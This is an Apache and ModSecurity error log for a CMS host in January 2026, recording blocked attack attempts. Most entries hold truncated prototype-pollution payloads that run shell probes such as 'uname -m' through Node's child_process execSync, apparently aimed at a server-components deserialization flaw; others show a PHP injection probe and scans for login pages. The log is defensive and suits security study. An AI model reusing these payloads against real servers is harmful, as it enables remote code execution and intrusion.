[pid 23874:tid 23894] [client 157.230.113.249:36696] [client 157.230.113.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\.fromcharcode\\\\b" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "238"] [id "958003"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: .fromcharcode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$b0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (promise.all([function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new promise((resolve, reject) => { try { var user..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aVcPq7KEyOlwJ7CBFsbLJwAAABA"] [Sat Jan 03 20:18:26.131151 2026] [:error] [pid 31981:tid 31996] [client 4.189.104.221:11241] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sat Jan 03 20:19:07.570441 2026] [:error] [pid 31981:tid 32007] [client 4.189.104.221:11074] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-login.php [Tue Jan 06 03:43:27.079533 2026] [:error] [pid 22436:tid 22454] [client 167.172.169.77:56524] [client 167.172.169.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\.fromcharcode\\\\b" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "238"] [id "958003"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: .fromcharcode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$b0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (promise.all([function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new promise((resolve, reject) => { try { var user..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aVxovy7y87EOhpN_9Cm8lwAAAUM"] [Fri Jan 09 19:54:56.027358 2026] [:error] [pid 25446:tid 25449] [client 180.190.226.249:61031] [client 180.190.226.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aWFA8Pmeoo0gNMMwkamAVgAAAME"] [Sun Jan 11 07:11:59.980280 2026] [:error] [pid 2059:tid 2073] [client 20.196.88.31:10383] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Thu Jan 22 17:56:27.569582 2026] [:error] [pid 23833:tid 23960] [client 95.111.227.74:50102] [client 95.111.227.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString();})();throw Object.assign(new Er..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXJIq8o_-i6oc32FN_gRKAAAAJU"] [Thu Jan 22 17:56:27.648189 2026] [:error] [pid 23829:tid 23887] [client 95.111.227.74:50112] [client 95.111.227.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TEST').toString();})();throw Object...."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXJIq0h2OoOxFPIh5RHTCQAAAAI"] [Fri Jan 23 00:03:16.079092 2026] [:error] [pid 1410:tid 1444] [client 34.31.246.19:42636] [client 34.31.246.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\.fromcharcode\\\\b" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "238"] [id "958003"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: .fromcharcode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$b0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (promise.all([function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new promise((resolve, reject) => { try { var user..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXKepIDcjBV5xEDNqy0rlQAAA1A"] [Fri Jan 23 02:42:07.651056 2026] [:error] [pid 1269:tid 1292] [client 144.91.75.93:35222] [client 144.91.75.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString();})();throw Object.assign(new Er..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXLD32GEvXZ9_gp7Z46MUQAAAow"] [Fri Jan 23 02:42:07.784572 2026] [:error] [pid 27498:tid 27510] [client 144.91.75.93:35224] [client 144.91.75.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TEST').toString();})();throw Object...."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXLD3yroIAtOpU7MrsuCRwAAAMQ"] [Fri Jan 23 02:42:38.775330 2026] [:error] [pid 27498:tid 27514] [client 124.222.77.202:55470] [client 124.222.77.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString();})();throw Object.assign(new Er..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXLD_iroIAtOpU7MrsuCegAAAMg"] [Fri Jan 23 02:42:39.992461 2026] [:error] [pid 27498:tid 27509] [client 124.222.77.202:55472] [client 124.222.77.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TEST').toString();})();throw Object...."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXLD_yroIAtOpU7MrsuCfQAAAMM"] [Fri Jan 23 07:21:27.792992 2026] [:error] [pid 27839:tid 27853] [client 173.230.138.239:39860] [client 173.230.138.239] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString();})();throw Object.assign(new Er..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXMFV7zFUg07V2GsFkeISAAAAMo"] [Fri Jan 23 07:21:28.200201 2026] [:error] [pid 27839:tid 27866] [client 173.230.138.239:39864] [client 173.230.138.239] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TEST').toString();})();throw Object...."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXMFWLzFUg07V2GsFkeISQAAANc"] [Tue Jan 27 00:55:57.763548 2026] [authz_core:error] [pid 17698:tid 17713] [client 165.227.84.14:39278] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Tue Jan 27 00:56:17.621720 2026] [:error] [pid 17853:tid 17930] [client 165.227.84.14:36308] [client 165.227.84.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aXfxEdi4dsbxs1EKUYoEewAAApU"] [Tue Jan 27 00:58:55.417879 2026] [:error] [pid 17385:tid 17462] [client 176.65.148.161:46904] [client 176.65.148.161] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-2048"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXfxry72UvX9BTgPlmvOgwAAAI4"] [Tue Jan 27 02:18:12.681399 2026] [:error] [pid 17698:tid 17724] [client 176.65.148.161:37988] [client 176.65.148.161] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-2048"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXgERBZetwElHybpVf_W3gAAAlg"] [Tue Jan 27 05:44:44.827219 2026] [:error] [pid 16782:tid 16824] [client 176.65.148.161:51080] [client 176.65.148.161] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-2048"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXg0rCSgQB4Ct2kUuelJrAAAAcs"] [Wed Jan 28 01:59:08.645734 2026] [:error] [pid 17107:tid 17118] [client 85.11.167.4:52168] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1769558381_7841',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1769558381_784..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXlRTJDpGe_61de3kFkZZQAAAoY"], referer: https://cms.dev-unit.com [Wed Jan 28 01:59:08.720227 2026] [:error] [pid 17329:tid 17362] [client 85.11.167.4:52170] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1769558381',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1769558381',{'timeo..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXlRTAvUOYrhppVINxkpkgAAA0A"], referer: https://cms.dev-unit.com [Wed Jan 28 11:32:11.382075 2026] [:error] [pid 4182:tid 4194] [client 3.75.87.204:43936] [client 3.75.87.204] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms.dev-unit.com"] [uri "/apps"] [unique_id "aXnXm2wnF_IRb0FEEEXuaAAAAMo"] [Wed Jan 28 13:46:00.400870 2026] [:error] [pid 6774:tid 6811] [client 85.11.167.4:55894] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1769600793_7870',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1769600793_787..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXn2-FhOp7ZZChWKpwtDJgAAAUY"], referer: https://cms.dev-unit.com [Wed Jan 28 13:46:00.478962 2026] [:error] [pid 6774:tid 6841] [client 85.11.167.4:55896] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev 